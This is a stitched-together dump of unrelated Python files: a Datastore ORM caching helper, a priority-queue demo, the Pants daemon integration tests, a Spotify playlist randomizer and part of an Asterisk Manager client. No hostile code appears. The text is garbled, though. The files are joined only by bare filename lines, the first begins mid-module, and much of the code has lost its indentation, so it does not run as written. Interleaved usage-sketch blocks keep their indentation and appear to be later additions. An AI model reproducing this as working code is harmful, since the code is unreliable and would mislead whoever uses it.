def get_single(self, keys, missing=None, deferred=None,
transaction=None, eventual=False, model_type=None, expiry=86400):
cache_key = 'datastore_orm.{}.{}'.format(keys[0].kind, keys[0].id_or_name)
try:
if self._cache:
obj = self._cache.get(cache_key)
if obj:
return [pickle.loads(obj)]
except:
pass
ids = set(key.project for key in keys)
for current_id in ids:
if current_id != self.project:
raise ValueError('Keys do not match project')
if transaction is None:
transaction = self.current_transaction
entity_pbs = _extended_lookup(
datastore_api=self._datastore_api,
project=self.project,
key_pbs=[key.to_protobuf() for key in keys],
eventual=eventual,
missing=missing,
deferred=deferred,
transaction_id=transaction and transaction.id,
)
if missing is not None:
missing[:] = [
CustomIterator.object_from_protobuf(missed_pb, model_type=model_type)
for missed_pb in missing]
if deferred is not None:
deferred[:] = [
CustomIterator.key_from_protobuf(deferred_pb)
for deferred_pb in deferred]
basemodels = [CustomIterator.object_from_protobuf(entity_pb, model_type=model_type)
for entity_pb in entity_pbs]
try:
if self._cache and basemodels:
self._cache.set(cache_key, pickle.dumps(basemodels[0]), expiry)
except:
pass
return basemodels
def initialize(clients, cache=None):
if not isinstance(clients, list):
clients = [clients]
orm_clients = []
for client in clients:
orm_clients.append(CustomClient(client=client, cache=cache))
BaseModel(orm_clients, cache)
CustomKey.__initialize_class__(orm_clients, cache)
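# ---------------------------------------------------------------------------
# Illustrative usage sketch (runs only when this module is executed directly).
# It assumes application-default Google Cloud credentials and a real Datastore
# project; the Person model and its fields are hypothetical.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    class Person(BaseModel):
        name: str
        age: int

        def __init__(self, name=None, age=None):
            self.name = name
            self.age = age

    # Bind every BaseModel subclass (and CustomKey) to one datastore client;
    # pass a StrictRedis instance as ``cache`` to enable read-through caching.
    initialize(datastore.Client(), cache=None)

    key = Person(name="Ada", age=36).put()       # write through the primary client
    print(key.get().to_dict())                   # read back via CustomKey.get()

    query = Person.query()                       # CustomQuery bound to this model
    query.add_filter("age", ">=", 18)
    print([p.to_dict() for p in query.fetch(limit=5)])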
|
priority_queue.py
|
# coding=utf-8
import itertools
import time
import threading
from random import randint
from queue import PriorityQueue  # "Queue" was renamed to "queue" in Python 3
q = PriorityQueue()
# Monotonic tie-breaker: when two queued items share a priority, PriorityQueue would
# otherwise compare the function objects, which raises TypeError in Python 3.
counter = itertools.count()
def double(n):
    return n * 2
def producer():
    count = 0
    while count <= 5:
        pri = randint(0, 100)
        print('put :{}'.format(pri))
        q.put((pri, next(counter), double, pri))  # (priority, tie-breaker, func, arg)
        count += 1
def consumer():
    while not q.empty():
        pri, _, task, arg = q.get()
        print('[PRI:{}] {} * 2 = {}'.format(pri, arg, task(arg)))
        q.task_done()
        time.sleep(0.1)
t = threading.Thread(target=producer)
t.start()
time.sleep(1)
t = threading.Thread(target=consumer)
t.start()
|
pantsd_integration_test.py
|
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import glob
import os
import signal
import threading
import time
import unittest
from textwrap import dedent
from typing import List, Optional, Tuple
import psutil
import pytest
from pants.testutil.pants_integration_test import (
PantsJoinHandle,
read_pantsd_log,
setup_tmpdir,
temporary_workdir,
)
from pants.util.contextutil import environment_as, temporary_dir, temporary_file
from pants.util.dirutil import (
maybe_read_file,
rm_rf,
safe_file_dump,
safe_mkdir,
safe_open,
safe_rmtree,
touch,
)
from pants_test.pantsd.pantsd_integration_test_base import PantsDaemonIntegrationTestBase, attempts
def launch_file_toucher(f):
"""Launch a loop to touch the given file, and return a function to call to stop and join it."""
if not os.path.isfile(f):
raise AssertionError("Refusing to touch a non-file.")
halt = threading.Event()
def file_toucher():
        while not halt.is_set():
touch(f)
time.sleep(1)
thread = threading.Thread(target=file_toucher)
thread.daemon = True
thread.start()
def join():
halt.set()
thread.join(timeout=10)
return join
compilation_failure_dir_layout = {
os.path.join("compilation_failure", "main.py"): "if __name__ == '__main__':\n import sys¡",
os.path.join(
"compilation_failure", "BUILD"
): "python_library()\npex_binary(name='bin', entry_point='main.py')",
}
class TestPantsDaemonIntegration(PantsDaemonIntegrationTestBase):
hermetic = False
def test_pantsd_run(self):
with self.pantsd_successful_run_context(log_level="debug") as ctx:
ctx.runner(["list", "3rdparty::"])
ctx.checker.assert_started()
ctx.runner(["list", "3rdparty::"])
ctx.checker.assert_running()
def test_pantsd_broken_pipe(self):
with self.pantsd_test_context() as (workdir, pantsd_config, checker):
run = self.run_pants_with_workdir(
"help | head -1", workdir=workdir, config=pantsd_config, shell=True
)
self.assertNotIn("broken pipe", run.stderr.lower())
checker.assert_started()
def test_pantsd_pantsd_runner_doesnt_die_after_failed_run(self):
with self.pantsd_test_context() as (workdir, pantsd_config, checker):
# Run target that throws an exception in pants.
with setup_tmpdir(compilation_failure_dir_layout) as tmpdir:
self.run_pants_with_workdir(
["lint", os.path.join(tmpdir, "compilation_failure", "main.py")],
workdir=workdir,
config=pantsd_config,
).assert_failure()
checker.assert_started()
# Assert pantsd is in a good functional state.
self.run_pants_with_workdir(
["help"], workdir=workdir, config=pantsd_config
).assert_success()
checker.assert_running()
def test_pantsd_lifecycle_invalidation(self):
"""Run with different values of daemon=True options, which should trigger restarts."""
with self.pantsd_successful_run_context() as ctx:
last_pid = None
for idx in range(3):
# Run with a different value of a daemon=True option in each iteration.
ctx.runner([f"--pantsd-invalidation-globs=ridiculous{idx}", "help"])
next_pid = ctx.checker.assert_started()
if last_pid is not None:
self.assertNotEqual(last_pid, next_pid)
last_pid = next_pid
def test_pantsd_lifecycle_non_invalidation(self):
with self.pantsd_successful_run_context() as ctx:
cmds = (["help"], ["--no-colors", "help"], ["help"])
last_pid = None
for cmd in cmds:
# Run with a CLI flag.
ctx.runner(cmd)
next_pid = ctx.checker.assert_started()
if last_pid is not None:
self.assertEqual(last_pid, next_pid)
last_pid = next_pid
def test_pantsd_lifecycle_non_invalidation_on_config_string(self):
with temporary_dir() as dist_dir_root, temporary_dir() as config_dir:
# Create a variety of config files that change an option that does _not_ affect the
# daemon's fingerprint (only the Scheduler's), and confirm that it stays up.
config_files = [
os.path.abspath(os.path.join(config_dir, f"pants.{i}.toml")) for i in range(3)
]
for idx, config_file in enumerate(config_files):
print(f"writing {config_file}")
with open(config_file, "w") as fh:
fh.write(
f"""[GLOBAL]\npants_distdir = "{os.path.join(dist_dir_root, str(idx))}"\n"""
)
with self.pantsd_successful_run_context() as ctx:
cmds = [[f"--pants-config-files={f}", "help"] for f in config_files]
last_pid = None
for cmd in cmds:
ctx.runner(cmd)
next_pid = ctx.checker.assert_started()
if last_pid is not None:
self.assertEqual(last_pid, next_pid)
last_pid = next_pid
def test_pantsd_lifecycle_shutdown_for_broken_scheduler(self):
with self.pantsd_test_context() as (workdir, config, checker):
# Run with valid options.
self.run_pants_with_workdir(["help"], workdir=workdir, config=config).assert_success()
checker.assert_started()
# And again with invalid scheduler-fingerprinted options that trigger a re-init.
self.run_pants_with_workdir(
["--backend-packages=nonsensical", "help"], workdir=workdir, config=config
).assert_failure()
checker.assert_stopped()
def test_pantsd_aligned_output(self) -> None:
# Set for pytest output display.
self.maxDiff = None
cmds = [["help", "goals"], ["help", "targets"], ["roots"]]
config = {
"GLOBAL": {
# These must match the ones we configure in pantsd_integration_test_base.py.
"backend_packages": ["pants.backend.python", "pants.backend.python.lint.flake8"],
}
}
non_daemon_runs = [self.run_pants(cmd, config=config) for cmd in cmds]
with self.pantsd_successful_run_context() as ctx:
daemon_runs = [ctx.runner(cmd) for cmd in cmds]
ctx.checker.assert_started()
for cmd, run in zip(cmds, daemon_runs):
print(f"(cmd, run) = ({cmd}, {run.stdout}, {run.stderr})")
self.assertNotEqual(run.stdout, "", f"Empty stdout for {cmd}")
for run_pair in zip(non_daemon_runs, daemon_runs):
non_daemon_stdout = run_pair[0].stdout
daemon_stdout = run_pair[1].stdout
for line_pair in zip(non_daemon_stdout.splitlines(), daemon_stdout.splitlines()):
assert line_pair[0] == line_pair[1]
@unittest.skip("flaky: https://github.com/pantsbuild/pants/issues/7622")
def test_pantsd_filesystem_invalidation(self):
"""Runs with pantsd enabled, in a loop, while another thread invalidates files."""
with self.pantsd_successful_run_context() as ctx:
cmd = ["list", "::"]
ctx.runner(cmd)
ctx.checker.assert_started()
# Launch a separate thread to poke files in 3rdparty.
join = launch_file_toucher("3rdparty/jvm/com/google/auto/value/BUILD")
# Repeatedly re-list 3rdparty while the file is being invalidated.
for _ in range(0, 16):
ctx.runner(cmd)
ctx.checker.assert_running()
join()
def test_pantsd_client_env_var_is_inherited_by_pantsd_runner_children(self):
expected_key = "TEST_ENV_VAR_FOR_PANTSD_INTEGRATION_TEST"
expected_value = "333"
with self.pantsd_successful_run_context() as ctx:
# First, launch the daemon without any local env vars set.
ctx.runner(["help"])
ctx.checker.assert_started()
# Then, set an env var on the secondary call.
# We additionally set the `HERMETIC_ENV` env var to allow the integration test harness
# to pass this variable through.
env = {
expected_key: expected_value,
"HERMETIC_ENV": expected_key,
}
with environment_as(**env):
result = ctx.runner(
["run", "testprojects/src/python/print_env", "--", expected_key]
)
ctx.checker.assert_running()
self.assertEqual(expected_value, "".join(result.stdout).strip())
def test_pantsd_launch_env_var_is_not_inherited_by_pantsd_runner_children(self):
with self.pantsd_test_context() as (workdir, pantsd_config, checker):
with environment_as(NO_LEAKS="33"):
self.run_pants_with_workdir(
["help"], workdir=workdir, config=pantsd_config
).assert_success()
checker.assert_started()
self.run_pants_with_workdir(
["run", "testprojects/src/python/print_env", "--", "NO_LEAKS"],
workdir=workdir,
config=pantsd_config,
).assert_failure()
checker.assert_running()
def test_pantsd_touching_a_file_does_not_restart_daemon(self):
test_file = "testprojects/src/python/print_env/main.py"
config = {
"GLOBAL": {"pantsd_invalidation_globs": '["testprojects/src/python/print_env/*"]'}
}
with self.pantsd_successful_run_context(extra_config=config) as ctx:
ctx.runner(["help"])
ctx.checker.assert_started()
# Let any fs events quiesce.
time.sleep(5)
ctx.checker.assert_running()
touch(test_file)
            # Permit ample time for the async file event to propagate in CI.
time.sleep(10)
ctx.checker.assert_running()
def test_pantsd_invalidation_file_tracking(self):
test_dir = "testprojects/src/python/print_env"
config = {"GLOBAL": {"pantsd_invalidation_globs": f'["{test_dir}/*"]'}}
with self.pantsd_successful_run_context(extra_config=config) as ctx:
ctx.runner(["help"])
ctx.checker.assert_started()
# Let any fs events quiesce.
time.sleep(5)
ctx.checker.assert_running()
def full_pantsd_log():
return "\n".join(read_pantsd_log(ctx.workdir))
# Create a new file in test_dir
with temporary_file(suffix=".py", binary_mode=False, root_dir=test_dir) as temp_f:
temp_f.write("import that\n")
temp_f.close()
ctx.checker.assert_stopped()
self.assertIn("saw filesystem changes covered by invalidation globs", full_pantsd_log())
def test_pantsd_invalidation_pants_toml_file(self):
# Test tmp_pants_toml (--pants-config-files=$tmp_pants_toml)'s removal
tmp_pants_toml = os.path.abspath("testprojects/test_pants.toml")
# Create tmp_pants_toml file
with safe_open(tmp_pants_toml, "w") as f:
f.write("[DEFAULT]\n")
with self.pantsd_successful_run_context() as ctx:
ctx.runner([f"--pants-config-files={tmp_pants_toml}", "help"])
ctx.checker.assert_started()
time.sleep(10)
# Delete tmp_pants_toml
os.unlink(tmp_pants_toml)
ctx.checker.assert_stopped()
def test_pantsd_pid_deleted(self):
with self.pantsd_successful_run_context() as ctx:
ctx.runner(["help"])
ctx.checker.assert_started()
# Let any fs events quiesce.
time.sleep(10)
ctx.checker.assert_running()
subprocess_dir = ctx.pantsd_config["GLOBAL"]["pants_subprocessdir"]
safe_rmtree(subprocess_dir)
ctx.checker.assert_stopped()
def test_pantsd_pid_change(self):
with self.pantsd_successful_run_context() as ctx:
ctx.runner(["help"])
ctx.checker.assert_started()
# Let any fs events quiesce.
time.sleep(10)
ctx.checker.assert_running()
subprocess_dir = ctx.pantsd_config["GLOBAL"]["pants_subprocessdir"]
(pidpath,) = glob.glob(os.path.join(subprocess_dir, "*", "pantsd", "pid"))
with open(pidpath, "w") as f:
f.write("9")
ctx.checker.assert_stopped()
# Remove the pidfile so that the teardown script doesn't try to kill process 9.
os.unlink(pidpath)
@pytest.mark.skip(reason="flaky: https://github.com/pantsbuild/pants/issues/8193")
def test_pantsd_memory_usage(self):
"""Validates that after N runs, memory usage has increased by no more than X percent."""
number_of_runs = 10
max_memory_increase_fraction = 0.40 # TODO https://github.com/pantsbuild/pants/issues/7647
with self.pantsd_successful_run_context() as ctx:
# NB: This doesn't actually run against all testprojects, only those that are in the chroot,
# i.e. explicitly declared in this test file's BUILD.
cmd = ["list", "testprojects::"]
ctx.runner(cmd).assert_success()
initial_memory_usage = ctx.checker.current_memory_usage()
for _ in range(number_of_runs):
ctx.runner(cmd).assert_success()
ctx.checker.assert_running()
final_memory_usage = ctx.checker.current_memory_usage()
self.assertTrue(
initial_memory_usage <= final_memory_usage,
"Memory usage inverted unexpectedly: {} > {}".format(
initial_memory_usage, final_memory_usage
),
)
increase_fraction = (float(final_memory_usage) / initial_memory_usage) - 1.0
self.assertTrue(
increase_fraction <= max_memory_increase_fraction,
"Memory usage increased more than expected: {} -> {}: {} actual increase (expected < {})".format(
initial_memory_usage,
final_memory_usage,
increase_fraction,
max_memory_increase_fraction,
),
)
def test_pantsd_max_memory_usage(self):
"""Validates that the max_memory_usage setting is respected."""
# We set a very, very low max memory usage, which forces pantsd to restart immediately.
max_memory_usage_bytes = 130
with self.pantsd_successful_run_context() as ctx:
# TODO: We run the command, but we expect it to race pantsd shutting down, so we don't
# assert success. https://github.com/pantsbuild/pants/issues/8200 will address waiting
# until after the current command completes to invalidate the scheduler, at which point
# we can assert success here.
ctx.runner(
[f"--pantsd-max-memory-usage={max_memory_usage_bytes}", "list", "testprojects::"]
)
# Assert that a pid file is written, but that the server stops afterward.
ctx.checker.assert_started_and_stopped()
def test_pantsd_invalidation_stale_sources(self):
test_path = "daemon_correctness_test_0001"
test_build_file = os.path.join(test_path, "BUILD")
test_src_file = os.path.join(test_path, "some_file.py")
filedeps_cmd = ["--files-not-found-behavior=warn", "filedeps", test_path]
try:
with self.pantsd_successful_run_context() as ctx:
safe_mkdir(test_path, clean=True)
ctx.runner(["help"])
ctx.checker.assert_started()
safe_file_dump(
test_build_file, "python_library(sources=['some_non_existent_file.py'])"
)
non_existent_file = os.path.join(test_path, "some_non_existent_file.py")
result = ctx.runner(filedeps_cmd)
ctx.checker.assert_running()
assert non_existent_file not in result.stdout
safe_file_dump(test_build_file, "python_library(sources=['*.py'])")
result = ctx.runner(filedeps_cmd)
ctx.checker.assert_running()
assert non_existent_file not in result.stdout
safe_file_dump(test_src_file, "print('hello')\n")
result = ctx.runner(filedeps_cmd)
ctx.checker.assert_running()
assert test_src_file in result.stdout
finally:
rm_rf(test_path)
@unittest.skip("TODO https://github.com/pantsbuild/pants/issues/7654")
def test_pantsd_parse_exception_success(self):
# This test covers the case described in #6426, where a run that is failing fast due to an
# exception can race other completing work. We expect all runs to fail due to the error
# that has been introduced, but none of them should hang.
test_path = "testprojects/3rdparty/this_is_definitely_not_a_valid_directory"
test_build_file = os.path.join(test_path, "BUILD")
invalid_symbol = "this_is_definitely_not_a_valid_symbol"
try:
safe_mkdir(test_path, clean=True)
safe_file_dump(test_build_file, f"{invalid_symbol}()")
for _ in range(3):
with self.pantsd_run_context(success=False) as ctx:
result = ctx.runner(["list", "testprojects::"])
ctx.checker.assert_started()
self.assertIn(invalid_symbol, result.stderr)
finally:
rm_rf(test_path)
@unittest.skip("TODO https://github.com/pantsbuild/pants/issues/7654")
def test_pantsd_multiple_parallel_runs(self):
with self.pantsd_test_context() as (workdir, config, checker):
file_to_make = os.path.join(workdir, "some_magic_file")
waiter_handle = self.run_pants_with_workdir_without_waiting(
["run", "testprojects/src/python/coordinated_runs:waiter", "--", file_to_make],
workdir=workdir,
config=config,
)
checker.assert_started()
creator_handle = self.run_pants_with_workdir_without_waiting(
["run", "testprojects/src/python/coordinated_runs:creator", "--", file_to_make],
workdir=workdir,
config=config,
)
creator_handle.join().assert_success()
waiter_handle.join().assert_success()
@classmethod
def _launch_waiter(cls, workdir: str, config) -> Tuple[PantsJoinHandle, int, str]:
"""Launch a process via pantsd that will wait forever for the a file to be created.
Returns the pid of the pantsd client, the pid of the waiting child process, and the file to
create to cause the waiting child to exit.
"""
file_to_make = os.path.join(workdir, "some_magic_file")
waiter_pid_file = os.path.join(workdir, "pid_file")
argv = [
"run",
"testprojects/src/python/coordinated_runs:waiter",
"--",
file_to_make,
waiter_pid_file,
]
client_handle = cls.run_pants_with_workdir_without_waiting(
argv, workdir=workdir, config=config
)
waiter_pid = -1
for _ in attempts("The waiter process should have written its pid."):
waiter_pid_str = maybe_read_file(waiter_pid_file)
if waiter_pid_str:
waiter_pid = int(waiter_pid_str)
break
return client_handle, waiter_pid, file_to_make
def _assert_pantsd_keyboardinterrupt_signal(
self, signum: int, regexps: Optional[List[str]] = None
):
"""Send a signal to the thin pailgun client and observe the error messaging.
:param signum: The signal to send.
:param regexps: Assert that all of these regexps match somewhere in stderr.
"""
with self.pantsd_test_context() as (workdir, config, checker):
client_handle, waiter_process_pid, _ = self._launch_waiter(workdir, config)
client_pid = client_handle.process.pid
waiter_process = psutil.Process(waiter_process_pid)
assert waiter_process.is_running()
checker.assert_started()
# This should kill the client, which will cancel the run on the server, which will
# kill the waiting process.
os.kill(client_pid, signum)
client_run = client_handle.join()
client_run.assert_failure()
for regexp in regexps or []:
self.assertRegex(client_run.stderr, regexp)
# pantsd should still be running, but the waiter process should have been killed.
time.sleep(5)
assert not waiter_process.is_running()
checker.assert_running()
def test_pantsd_sigint(self):
self._assert_pantsd_keyboardinterrupt_signal(
signal.SIGINT,
regexps=["Interrupted by user."],
)
def test_sigint_kills_request_waiting_for_lock(self):
"""Test that, when a pailgun request is blocked waiting for another one to end, sending
SIGINT to the blocked run will kill it."""
config = {"GLOBAL": {"pantsd_timeout_when_multiple_invocations": -1, "level": "debug"}}
with self.pantsd_test_context(extra_config=config) as (workdir, config, checker):
# Run a process that will wait forever.
first_run_handle, _, file_to_create = self._launch_waiter(workdir, config)
checker.assert_started()
checker.assert_running()
# And another that will block on the first.
blocking_run_handle = self.run_pants_with_workdir_without_waiting(
command=["goals"], workdir=workdir, config=config
)
# Block until the second request is waiting for the lock.
time.sleep(10)
# Sends SIGINT to the run that is waiting.
blocking_run_client_pid = blocking_run_handle.process.pid
os.kill(blocking_run_client_pid, signal.SIGINT)
blocking_run_handle.join()
# Check that pantsd is still serving the other request.
checker.assert_running()
            # Exit the first (waiter) run by writing the file it is waiting for, and
            # confirm that it exited and that pantsd is still running.
safe_file_dump(file_to_create, "content!")
result = first_run_handle.join()
result.assert_success()
checker.assert_running()
def test_pantsd_unicode_environment(self):
with self.pantsd_successful_run_context(extra_env={"XXX": "¡"}) as ctx:
result = ctx.runner(["help"])
ctx.checker.assert_started()
result.assert_success()
# This is a regression test for a bug where we would incorrectly detect a cycle if two targets swapped their
# dependency relationship (#7404).
def test_dependencies_swap(self):
template = dedent(
"""
python_library(
name = 'A',
source = 'A.py',
{a_deps}
)
python_library(
name = 'B',
source = 'B.py',
{b_deps}
)
"""
)
with self.pantsd_successful_run_context() as ctx:
with temporary_dir(".") as directory:
safe_file_dump(os.path.join(directory, "A.py"), mode="w")
safe_file_dump(os.path.join(directory, "B.py"), mode="w")
if directory.startswith("./"):
directory = directory[2:]
def list_and_verify():
result = ctx.runner(["list", f"{directory}:"])
ctx.checker.assert_started()
result.assert_success()
expected_targets = {f"{directory}:{target}" for target in ("A", "B")}
self.assertEqual(expected_targets, set(result.stdout.strip().split("\n")))
with open(os.path.join(directory, "BUILD"), "w") as f:
f.write(template.format(a_deps='dependencies = [":B"],', b_deps=""))
list_and_verify()
with open(os.path.join(directory, "BUILD"), "w") as f:
f.write(template.format(a_deps="", b_deps='dependencies = [":A"],'))
list_and_verify()
def test_concurrent_overrides_pantsd(self):
"""Tests that the --concurrent flag overrides the --pantsd flag, because we don't allow
concurrent runs under pantsd."""
config = {"GLOBAL": {"concurrent": True, "pantsd": True}}
with temporary_workdir() as workdir:
pants_run = self.run_pants_with_workdir(
["help", "goals"], workdir=workdir, config=config
)
pants_run.assert_success()
pantsd_log_location = os.path.join(workdir, "pantsd", "pantsd.log")
self.assertFalse(os.path.exists(pantsd_log_location))
def test_unhandled_exceptions_only_log_exceptions_once(self):
"""Tests that the unhandled exceptions triggered by LocalPantsRunner instances don't
manifest as a PantsRunFinishedWithFailureException.
That is, that we unset the global Exiter override set by LocalPantsRunner before we try to log the exception.
This is a regression test for the most glaring case of https://github.com/pantsbuild/pants/issues/7597.
"""
with self.pantsd_run_context(success=False) as ctx:
result = ctx.runner(["run", "testprojects/src/python/bad_requirements:use_badreq"])
ctx.checker.assert_running()
result.assert_failure()
# Assert that the desired exception has been triggered once.
self.assertRegex(result.stderr, r"ERROR:.*badreq==99.99.99")
# Assert that it has only been triggered once.
self.assertNotIn(
"During handling of the above exception, another exception occurred:",
result.stderr,
)
self.assertNotIn(
"pants.bin.daemon_pants_runner._PantsRunFinishedWithFailureException: Terminated with 1",
result.stderr,
)
|
randomizer.py
|
import spotipy
import os
import spotipy.util as util
from http.server import HTTPServer, BaseHTTPRequestHandler
from threading import Thread
from random import shuffle
import requests
# os.environ["SPOTIPY_CLIENT_ID"] = ""
# os.environ["SPOTIPY_CLIENT_SECRET"] = ""
# os.environ["USER"] = ""
# os.environ["PLAYLISTS"] = ""
SERVER_PORT = 14523
os.environ["SPOTIPY_REDIRECT_URI"] = "http://localhost:{}".format(SERVER_PORT)
scope = 'user-library-read playlist-read-private playlist-read-collaborative playlist-modify-private playlist-modify-public'
class FailedAuth(Exception):
"""Failed authentication for spotify"""
def __init__(self, message):
self.message = message
def __str__(self):
return repr(self.message)
class NotFound(BaseException):
def __init__(self, message):
self.message = message
def __str__(self):
return repr(self.message)
class MyHTTPHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write('<html><body><h1 style="text-align:center">Great! Now go back to the python program and insert the URL of this page:</h1><button onclick="copy()" style="margin: 0 auto;display:block">Copy to clipboard</button><textarea id="textarea" style="display: block; margin: 0 auto; width: 60%"></textarea><script>var txt = document.getElementById("textarea"); txt.value = window.location.href;txt.select();function copy() {txt.select();document.execCommand("copy");}</script></body></html>'.encode('utf-8'))
def log_message(self, format, *args):
return
class StoppableSilentHTTPServer(HTTPServer):
stopped = False
def __init__(self, *args, **kw):
HTTPServer.__init__(self, *args, **kw)
def serve_forever(self):
while not self.stopped:
self.handle_request()
def force_stop(self):
self.stopped = True
# Ensure a last run of the thread so it can exit
requests.get(url='http://localhost:{}'.format(SERVER_PORT))
self.server_close()
class SpotifyAuth:
def __init__(self, username):
self._username = username
self._sp = None
self.httpd = None
def wait_for_auth(self):
self.httpd = StoppableSilentHTTPServer(('', SERVER_PORT), MyHTTPHandler)
Thread(target=self.httpd.serve_forever).start()
token = util.prompt_for_user_token(self._username, scope)
if token:
self._sp = spotipy.Spotify(auth=token)
else:
raise FailedAuth("Could not obtain a Spotify token for user '{}'".format(self._username))
def get_spotify(self):
return self._sp
def stop_server(self):
self.httpd.force_stop()
def __list_add_tracks__(list_object, tracks):
for item in tracks["items"]:
track = item["track"]
if track["id"] is not None:
list_object.append(track["id"])
return list_object
def __add_playlist__(playlist_list, playlists):
for item in playlists["items"]:
playlist_list.append(item)
return playlist_list
def __chunk_list__(data, size):
return [data[x:x + size] for x in range(0, len(data), size)]
class SpotifyRandomizer:
""""Randomizes a playlist in spotify"""
def __init__(self, username, sp):
self._username = username
self._sp = sp
self._playlist = None
self._random_playlist_name = "{} (Randomized)"
def set_playlist_by_id(self, playlist_id):
try:
self._playlist = self._sp.user_playlist(self._username, playlist_id)
except BaseException:
raise NotFound("No playlist found")
if self._playlist is None:
raise NotFound("No playlist found")
def set_playlist_by_name(self, name):
self._playlist = self.__find_playlist__(name)
if self._playlist is None:
raise NotFound("No playlist found")
def __find_playlist__(self, name):
playlists = self.get_all_playlists()
for item in playlists:
if item["name"] == name:
return item
return None
def get_playlist_tracks(self, playlist=None):
if playlist is None:
playlist = self._playlist
track_list = []
result = self._sp.user_playlist(self._username, playlist["id"], fields="tracks,next")
tracks = result["tracks"]
track_list = __list_add_tracks__(track_list, tracks)
while tracks["next"]:
tracks = self._sp.next(tracks)
track_list = __list_add_tracks__(track_list, tracks)
return track_list
def __remove_all_tracks__(self, playlist):
if playlist is None:
return
tracks = self.get_playlist_tracks(playlist)
for chunk in __chunk_list__(tracks, 100):
self._sp.user_playlist_remove_all_occurrences_of_tracks(self._username, playlist["id"], chunk)
def __get_random_playlist__(self):
return self.__find_playlist__(self._random_playlist_name.format(self._playlist["name"]))
def __create_random_playlist__(self):
return self._sp.user_playlist_create(self._username,
self._random_playlist_name.format(self._playlist["name"]),
False)
def get_playlist_size(self, playlist=None):
if playlist is not None:
return playlist["tracks"]["total"]
elif self._playlist is not None:
return self._playlist["tracks"]["total"]
def add_tracks_to_playlist(self, tracks, playlist=None):
if playlist is None and self._playlist is not None:
playlist = self._playlist
elif self._playlist is None:
return
for chunk in __chunk_list__(tracks, 100):
self._sp.user_playlist_add_tracks(self._username, playlist["id"], chunk)
def randomize_playlist(self):
if self._playlist is None:
raise TypeError
random_playlist = self.__get_random_playlist__()
if random_playlist is None:
random_playlist = self.__create_random_playlist__()
if self.get_playlist_size(random_playlist) > 1:
# Just in case, so the playlist randomized never gets deleted due to a bug again.
if random_playlist['id'] == self._playlist['id']:
print("FATAL ERROR: Program tried to erase original playlist due to a bug. Please report this behaviour.")
return
self.__remove_all_tracks__(random_playlist)
tracks = self.get_playlist_tracks()
shuffle(tracks)
self.add_tracks_to_playlist(tracks, random_playlist)
def get_all_playlists(self):
playlist_list = []
playlists = self._sp.user_playlists(self._username)
__add_playlist__(playlist_list, playlists)
while playlists["next"]:
playlists = self._sp.next(playlists)
__add_playlist__(playlist_list, playlists)
return playlist_list
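# --- Illustrative usage sketch (not part of the original module) ---
# A minimal example of combining SpotifyAuth and SpotifyRandomizer, assuming the
# SPOTIPY_* credentials are configured and that USER holds the Spotify username
# and PLAYLISTS a comma-separated list of playlist names (both are assumptions).
if __name__ == "__main__":
    auth = SpotifyAuth(os.environ["USER"])
    auth.wait_for_auth()  # starts the local HTTP server and prompts for the redirect URL
    try:
        randomizer = SpotifyRandomizer(os.environ["USER"], auth.get_spotify())
        for name in os.environ.get("PLAYLISTS", "").split(","):
            if not name:
                continue
            randomizer.set_playlist_by_name(name)
            randomizer.randomize_playlist()  # fills "<name> (Randomized)" with a shuffled copy
    finally:
        auth.stop_server()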
|
manager.py
|
#!/usr/bin/env python
# vim: set expandtab shiftwidth=4:
"""
Python Interface for Asterisk Manager
This module provides a Python API for interfacing with the asterisk manager.
import py_star.manager
import sys
def handle_shutdown(event, manager):
print ("Received shutdown event")
manager.close()
# we could analyze the event and reconnect here
def handle_event(event, manager):
print ("Received event: %s" % event.name)
manager = py_star.manager.Manager()
try:
# connect to the manager
try:
manager.connect('host')
manager.login('user', 'secret')
# register some callbacks
manager.register_event('Shutdown', handle_shutdown) # shutdown
manager.register_event('*', handle_event) # catch all
# get a status report
response = manager.status()
manager.logoff()
except py_star.manager.ManagerSocketException as err:
errno, reason = err.args
print("Error connecting to the manager: %s" % reason)
sys.exit(1)
except py_star.manager.ManagerAuthException as reason:
print ("Error logging in to the manager: %s" % reason)
sys.exit(1)
except py_star.manager.ManagerException as reason:
print ("Error: %s" % reason)
sys.exit(1)
finally:
# remember to clean up
manager.close()
Remember all header, response, and event names are case sensitive.
Not all manager actions are implemented yet; feel free to add them
and submit patches.
"""
from __future__ import absolute_import, print_function, unicode_literals
import logging
import os
import socket
import sys
import threading
from . import compat_six as six
from six.moves import queue
logger = logging.getLogger(__name__)
EOL = '\r\n'
class _Message(object):
def __init__(self):
self.headers = {}
def has_header(self, hname):
"""Check for a header"""
return hname in self.headers
def get_header(self, hname, defval=None):
"""Return the specified header"""
return self.headers.get(hname, defval)
def __getitem__(self, hname):
"""Return the specified header"""
return self.headers[hname]
def __repr__(self):
return self.headers['Response']
# backwards compatibility
_Msg = _Message
class ManagerMessage(_Message):
"""A manager interface message"""
def __init__(self, response):
super(ManagerMessage, self).__init__()
# the raw response, straight from the horse's mouth:
self.response = response
self.data = ''
self.multiheaders = {}
# parse the response
self.parse(response)
# This is an unknown message, may happen if a command (notably
# 'dialplan show something') contains a \n\r\n sequence in the
# middle of output. We hope this happens only *once* during a
# misbehaved command *and* the command ends with --END COMMAND--
# in that case we return an Event. Otherwise we assume it is
# from a misbehaving command not returning a proper header (e.g.
# IAXnetstats in Asterisk 1.4.X)
# A better solution is probably to retain some knowledge of
# commands sent and their expected return syntax. In that case
# we could wait for --END COMMAND-- for 'command'.
# B0rken in asterisk. This should be parseable without context.
if 'Event' not in self.headers and 'Response' not in self.headers:
# there are commands that return the ActionID but not
# 'Response', e.g., IAXpeers in Asterisk 1.4.X
if self.has_header('ActionID'):
self.headers['Response'] = 'Generated Header'
self.multiheaders['Response'] = ['Generated Header']
elif '--END COMMAND--' in self.data:
self.headers['Event'] = 'NoClue'
self.multiheaders['Event'] = ['NoClue']
else:
self.headers['Response'] = 'Generated Header'
self.multiheaders['Response'] = ['Generated Header']
def parse(self, response):
"""Parse a manager message"""
data = []
for n, line in enumerate(response):
# all valid header lines end in \r\n
if not line.endswith('\r\n'):
data.extend(response[n:])
break
try:
k, v = (x.strip() for x in line.split(':', 1))
if k not in self.multiheaders:
self.multiheaders[k] = []
self.headers[k] = v
self.multiheaders[k].append(v)
except ValueError:
# invalid header, start of multi-line data response
data.extend(response[n:])
break
self.data = ''.join(data)
# backwards compatibility
ManagerMsg = ManagerMessage
